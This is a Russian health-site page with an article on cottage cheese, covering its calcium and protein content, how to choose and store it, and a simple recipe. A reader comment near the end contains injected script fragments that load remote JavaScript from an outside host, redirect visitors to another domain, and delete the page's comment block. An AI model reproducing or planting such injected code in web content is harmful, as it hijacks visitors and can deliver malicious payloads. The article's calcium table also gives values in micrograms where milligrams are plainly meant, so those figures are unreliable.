Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сыр домашний для здоровья...  >>  Сыр домашний для здоровья костей
 
Обратная связь
 

Сыр домашний для здоровья костей

Размер шрифта
06 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Покупая сыр домашний, который больше походит на слегка подсоленный творог, мы думаем, а почему этот продукт называют сыром? Наш рассказ – о свойствах домашнего сыра, может быть поможет понять суть его названия.

Сыр домашний – это молочный продукт, который действительно относится к сыру, потому что технология их производства сходная.

Молоко ферментируется при помощи специальных веществ, из него образуется творог. Полученный творог выдерживается очень короткое время. Получается живой продукт, который становится соленым при добавлении небольшого количества соли в качестве консерванта.

Полезные свойства

Сыр домашний это концентрированный белок: 4,5 литра молока содержит столько же белка, сколько полкилограмма такого сыра, причем в нем почти нет углеводов.

В сыре домашнем большое содержание кальция, витаминов группы В (В1, В2), бета-каротина. Интересно, что витамины в этом виде сыра не разрушаются, потому что он не подвергается термической обработке.

Пьедестал почета по содержанию кальция

Сыр домашний – 260 мкг/100 г
Йогурт – 200 мкг/100 г
Молоко – 143 мкг/100 г

Молочные продукты являются основным источником кальция для человека. В костях и зубах человека содержится 90% кальция. В норме кальций теряется физиологически, потому что многие системы организма постоянно нуждаются в этом микроэлементе, а с возрастом это проявляется еще сильнее. Если не восполнять уровень кальция, то разовьется заболевание остеопороз, когда кости становятся хрупкими и легче ломаются.

Как выбрать

Выбираем сыр домашний по жирности: 0%, 0,5% или 2,5%. Срок годности при выборе сыра тоже очень важен, чем он больше, тем больше соли добавлено либо содержится консервант. Качественный продукт имеет срок годности не более 7 дней.

Чаще всего сыр домашний стандартной жирности находится в сливках и должен быть рассыпчатым, без кислинки или горечи.

Как хранить

Если вы вскрыли упаковку с сыром, то хранить его можно в холодильнике только одни сутки.

Как готовить

Сыр домашний продается готовым к употреблению, но его можно употреблять как с фруктами, так и с овощами, а также из него готовят различные блюда.

Рецепт. Сыр домашний с овощами

При помощи специальной формы укладываем слоями следующие продукты: сыр домашний, зелень и помидоры. Подаем с припущенными овощами.

Сюжеты по теме:
Сыр домашний

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лучшая еда после застолья   В вопросе ГМО поставлена точка! Есть или не есть?   Пасхальный кулич с пользой   Творожная пасха: как подготовиться к празднику  

Слайдшоу

Ошибки в еде, которые вы точно делаете!    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.